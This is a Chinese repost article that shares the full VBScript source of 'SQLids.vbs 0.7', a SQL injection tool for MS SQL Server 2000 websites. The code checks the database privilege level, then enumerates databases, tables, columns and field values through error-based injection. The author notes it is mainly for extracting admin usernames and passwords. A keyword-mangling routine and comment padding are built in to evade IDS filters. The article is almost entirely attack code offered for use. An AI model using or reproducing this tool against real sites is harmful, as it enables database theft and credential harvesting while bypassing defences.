SQLids.vbs 0.7(最终版,以后改成gui界面的)
导读:收集整理的这篇文章主要介绍了SQLids.vbs 0.7(最终版,以后改成gui界面的 ,觉得挺不错的,现在分享给大家,也给大家做个参考。 是有这个问题的。第一,应当用正则判断较好。第二...
收集整理的这篇文章主要介绍了SQLids.vbs 0.7(最终版,以后改成gui界面的),觉得挺不错的,现在分享给大家,也给大家做个参考。 是有这个问题的。
第一,应当用正则判断较好。
第二,我用循环加返回结果大于30个长度就退出循环,我相信没有表名和字段名大于30个字母的,但是字段值有可能大于,这个地方解决的不够好。但是一般是用来查后台的管理员的用户名和密码,所以就放弃了。
set arg=wscript.arguments If (LCase(Right(Wscript.fullname,11))="Wscript.Exe") Then Wscript.QuIT End If if arg.count=0 then usage() Wscript.Quit End If Sub usage() wsh.echo string(79,"*") wsh.echo "暂且只支持msSQL显错模式,直接写url为数字型,写url'为字符型,url里有&
请用双引号包含url" wsh.echo "sqlids v0.7 for mssql2000 with error by lcx" wsh.echo "以下两个脚本可互相参考" wsh.echo "//www.js-code.COM/article/14172.htm" wsh.echo "http://hi.baidu.com/myvbscript/blog/item/5c9b29124a3fa55bf919b878.htML" wsh.echo "Usage:" wsh.echo "cscript "&
wscript.scriptname&
" url limit ||----------->
得到当前权限"&
vbcrlf&
"Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 limit" wsh.echo "cscript "&
wscript.scriptname&
" url dbname ||----------->
得到全部库名"&
vbcrlf&
"Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 dbname" wsh.echo "cscript "&
wscript.scriptname&
" url table 库名||-------->
得到所给库的全部表名"&
vbcrlf&
"Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 table master" wsh.echo "cscript "&
wscript.scriptname&
" url filed 库名 表名 ||---------->
得到所给库所给表的全部字段"&
vbcrlf&
"Ex:cscript sql.vbs http://ww.x.com/1.asp? id=1 filed master spt_server_info" wsh.echo "cscript "&
wscript.scriptname&
" url result 字段名 库名 表名||--->
得所给库、表、字段的字段值"&
vbcrlf&
"Ex:cscript sql.vbs http://ww.x.com/1.asp? id=1 result id master Sysinfo" wsh.echo "cscript "&
wscript.scriptname&
" url seArch 你要查找的字段名||--->
根据关键字查找字段"&
vbcrlf&
"Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 search pass" wsh.echo string(79,"*")&
vbcrlf end Sub Function getHTTPPage(Path) t = GetBody(Path) getHTTPPage = BytestoBstr(t, "GB2312") End Function Function UrlEncode(str) str = Replace(str," ","%20") UrlEncode = str End Function Function GetBody(url)' XMl得到网页源码,可以改成cookie或get提交 On Error Resume Next Aurl=Split(url,"?") '这是为post提交的 Set Retrieval = CreateObject("Microsoft.XMLHTTP") With Retrieval .OPEn "post", Aurl(0), False, "", "" .setRequestHeader "Content-type", "application/x-www-form-urlencoded" .setRequestHeader "Accept-Encoding", "gzip, deflate" .setRequestHeader "User-Agent", "Mozilla/4.0 (compatible;
MSIE 7.0;
Windows NT 6.0;
SLCC1;
.NET CLR 2.0.50727;
Media center PC 5.0;
.NET CLR 3.0.04506;
.NET CLR 1.1.4322)" .setRequestHeader "Connection", "Keep-Alive" .setRequestHeader "Cache-Control", "no-cache" .Send UrlEncode(Aurl(1)) 'post提交 GetBody = .ResponseBody .abort End With Set Retrieval = Nothing End Function Function BytesToBstr(Body, Cset) Dim objstream Set objstream = CreateObject("adodb.stream") objstream.Type = 1 objstream.Mode = 3 objstream.Open objstream.Write Body objstream.Position = 0 objstream.Type = 2 objstream.Charset = Cset BytesToBstr = objstream.ReadTExt objstream.Close Set objstream = Nothing End Function Function ReplaceKeyWord(Value)'绕过ids过虑 Table = "select->
se%lect|[k]|insert->
in%sert|[k]|update->
u%pdate|[k]|delete->
dele%te|[k]|drop->
dr%op|[k]|alter->
al%ter|[k]|create->
crea%te|[k]|inner->
in% ner|[k]|join->
jo%in|[k]|From->
fro%m|[k]|where->
w%here|[k]|union->
unio%n|[k]|group->
grou%p|[k]|by->
b%y|[k]|having->
hav%ing|[k]|table->
tab%le|[k]|shutdown- >
shu%tdown|[k]|kill->
k%ill|[k]|declare->
dec%lare|[k]|open->
o%pen|[k]|pwdencrypt->
pwdencr%ypt|[k]|msdasql->
m%sdasql|[k]|sqLOLedb->
sqlo%ledb|[k]|char->
c%har| [k]|fetch->
fe%tch|[k]|nExt->
ne%xt|[k]|allocate->
al%locate|[k]|sys->
s%ys|[k]|raiserror->
raiser%ror|[k]|Exec->
e%xec|[k]|=!->
=%!|[k]|--->
-%-|[k]|xp_->
x%p_|[k] |sp_->
s%p_|[k]|and->
a%nd" Dim i, Relpacement, Temp Relpacement = Split(Table, "|[k]|") ReplaceKeyWord = Value For i = 0 to UBound(Relpacement) Temp = Split(Relpacement(i), "->
") If UBound(Temp) = 1 Then ReplaceKeyWord = Replace(ReplaceKeyWord, Temp(0), Temp(1)) NExt End Function Function result(sHTMLTEMP) '用VARchar做关键字分隔网页内容,用正则帅一点,可惜不太会 aHTML = Split(sHTMLTEMP, "varchar") If(UBound(aHTML) >
0)Then sHTMLTEMP = aHTML(1) aHTML = Split(sHTMLTEMP, "'") sHTMLTEMP = aHTML(1) End If result=sHTMLTEMP End Function Function Str2HEx(strHEx)'sql的16进制转换函数 Dim sHEx For i = 1 To Len(strHEx) sHEx = sHEx &
HEx(Asc(Mid(strHEx,i,1)))&
"00" NExt Str2HEx = "0x"&
sHEx End Function Function Str2HExtwo(strHEx)'sql的16进制转换函数 Dim sHEx For i = 1 To Len(strHEx) sHEx = sHEx &
HEx(Asc(Mid(strHEx,i,1))) NExt Str2HExtwo = "0x"&
sHEx End Function Function MoveR(Rstr) '去重复 Dim i,SpStr SpStr = Split(Rstr,",") For i = 0 To Ubound(Spstr) If I = 0 then MoveR = MoveR &
SpStr(i) &
"," Else If instr(MoveR,SpStr(i))=0 and i=Ubound(Spstr) Then MoveR = MoveR &
SpStr(i) Elseif instr(MoveR,SpStr(i))=0 Then MoveR = MoveR &
SpStr(i) &
"," End If End If NExt End Function function page(sql) page=Replace(getHTTPPage(url&
" "&
ReplaceKeyWord(sql)),Chr(34),"") End Function url=arg(0) injection =arg(1) '--------------------------------------以下代码是注入语句,完全不需要引号 select case arg(1) Case "limit" body=Replace(getHTTPPage(url),Chr(34),"") '语句单独提出来,方便以后修改,第一条是sa,第二条是DB_owner sqlone="and (select is_srvrolemember(0x730079007300610064006D0069006E00))>
0--" sqltwo="and (select is_member(0x640062005F006F0077006E0065007200))>
0--" Bodyone=page(sqlone) bodytwo=page(sqltwo) wsh.echo "当前信息:" If Len(body)=Len(Bodyone) Then wsh.echo "SA" If Len(body)=Len(Bodytwo) And Len(body)>
Len(Bodyone) Then wsh.echo "DB_owner" Else wsh.echo "PUBLIC" End If sqlthtree="and @@servername>
0--|and @@version>
0--|and user>
0--|and db_name()>
0--" rtemp=Split(sqlthtree,"|") servername=result(page(rtemp(0))) version=result(page(rtemp(1))) user=result(page(rtemp(2))) db_name=result(page(rtemp(3))) wsh.echo "servername:"&
servername wsh.echo "version:"&
version wsh.echo "user:"&
user wsh.echo "db_name:"&
db_name case "dbname" i=1 Do sql="and db_name("&
i&
")>
0--" '暴库名语句 Body = page(sql) k=Instrrev(body,"varchar", -1, 0) i=i+1 If k>
0 Then wscript.echo result(body) Else wsh.echo "========over============" End if Loop Until k=0 case "table" i=1 Do ' 表名语句 agr(2)表示库 sql="and 0>
(select top 1 name from "&
arg(2)&
".dbo.sysobjects where xtype=0x7500 and name not in (select top "&
i &
" name from "&
arg(2)&
".dbo.sysobjects where xtype=0x7500))--" Body = page(sql) k=InstrRev(body,"varchar", -1, 0) i=i+1 If k>
0 Then wscript.echo result(body) Else wsh.echo "========over============" End if Loop Until k=0 case "filed" sqlbiaoid="an%d (se%l%e%c%t to%p 1 ca%st(id as nvarch%ar(20))%2bch%ar(124) fr%om ["&
arg(2)&
"]..[sy%sob%je%cts] wh%ere name="&
Str2HEx(arg(3))&
")=0-- " biaoid=result(page(sqlbiaoid)) biaoid=Replace(biaoid,Chr(124),"") sqlclounmcnt="an%d (se%l%e%c%t ca%st(co%unt(1) as varch%ar(10))%2bch%ar(94) fr%om ["&
arg(2)&
"]..[sys%columns] wh%ere id="&
biaoid&
")=0-- " k=Replace(result(page(sqlclounmcnt)),Chr(94),"") wsh.echo "共有列名"&
k&
"个" For i=1 To k sqlfiled=" an%d (se%l%e%c%t to%p 1 ca%st(name as varch%ar(8000)) fr%om (se%l%e%c%t to%p "&
i&
" colid,name fr%om ["&
arg(2)&
"]..[sys%columns] wh%ere id="&
biaoid&
" order by colid) t order by colid desc)=0--" wsh.echo result(page(sqlfiled)) nExt case "result" i=1 sqlcloum="and (select cast(count(1) as varch%ar(8000))%2bchar(94) from ["&
arg(3)&
"]..["&
arg(4)&
"] where 1=1)>
0--" '暴列的总数目语句 k=result(page(sqlcloum)) k=Replace(k,Chr(94),"") wsh.echo arg(2)&
"字段共有记录数"&
k&
"个"&
vbcrlf For i=1 To k sqlneirong= "an%d (se%l%e%c%t to%p 1 ca%st("&
arg(2)&
" as varch%ar)%2bch%ar(94) fr%om (se%l%e%c%t to%p "&
i&
" ["&
arg(2)&
"] fr%om ["&
arg(3)&
"]..["&
arg(4) &
"] wh%ere 1=1 order by ["&
arg(2)&
"]) t wh%ere 1=1 order by ["&
arg(2)&
"] desc )=0--" Body = page(sqlneirong) wscript.echo Replace(result(body),Chr(94),"") Next Case "search" love=Str2HExtwo(arg(2)) wscript.echo "请稍候,正在查循,暂且只列10条,结果显示为'表名|字段名'格式" TimeSpend = Timer For i=1 To 10 '可以根据需要改动这个10 sqlsearch="And (select/* */top/* */1/* */t_name%2bchar(124)%2bc_name/* */from/* */(select/* */top/* */"&
i&
"/* */object_name(id)/* */as/* */t_name,name/* */as/* */c_name/* */from/* */syscolumns/* */where/* */charindEx(cast("&
love&
"/* */as/* */varchar(2000)),name)%3E0/* */and/* */left(name,1)!=0x40/* */order/* */by/* */t_name/* */asc)/* */as/* */T/* */order/* */by/* */t_name/* */desc)>
0--" Body = page(sqlsearch) body=result(body) a=a&
body&
"," NExt TimeSpend = round(Timer - TimeSpend,2) wsh.echo MoveR(a) wsh.echo "用时:" &
TimeSpend &
"秒." Case Else If arg(1)>
"limit" Or arg(1)>
"dbname" Or arg(1)>
"search" Or arg(1)>
"table" Or arg(1)>
"filed" Then wscript.echo "注意参数" usage() End if end select 到此这篇关于SQLids.vbs 0.7(最终版,以后改成gui界面的)的文章就介绍到这了,更多相关SQLids内容请搜索以前的文章或继续浏览下面的相关文章希望大家以后多多支持!
声明:本文内容由网友自发贡献,本站不承担相应法律责任。对本内容有异议或投诉,请联系2913721942#qq.com核实处理,我们将尽快回复您,谢谢合作!
若转载请注明出处: SQLids.vbs 0.7(最终版,以后改成gui界面的)
本文地址: https://pptw.com/jishu/609814.html